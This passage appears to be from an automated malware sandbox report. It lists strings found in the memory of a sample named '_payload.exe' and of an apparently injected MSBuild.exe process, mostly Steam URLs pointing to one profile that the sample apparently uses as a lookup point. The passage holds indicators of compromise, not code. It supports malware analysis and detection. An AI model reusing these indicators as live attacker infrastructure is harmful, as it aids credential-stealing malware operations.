00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259%
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003202000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259O
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003202000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/z
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowere
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 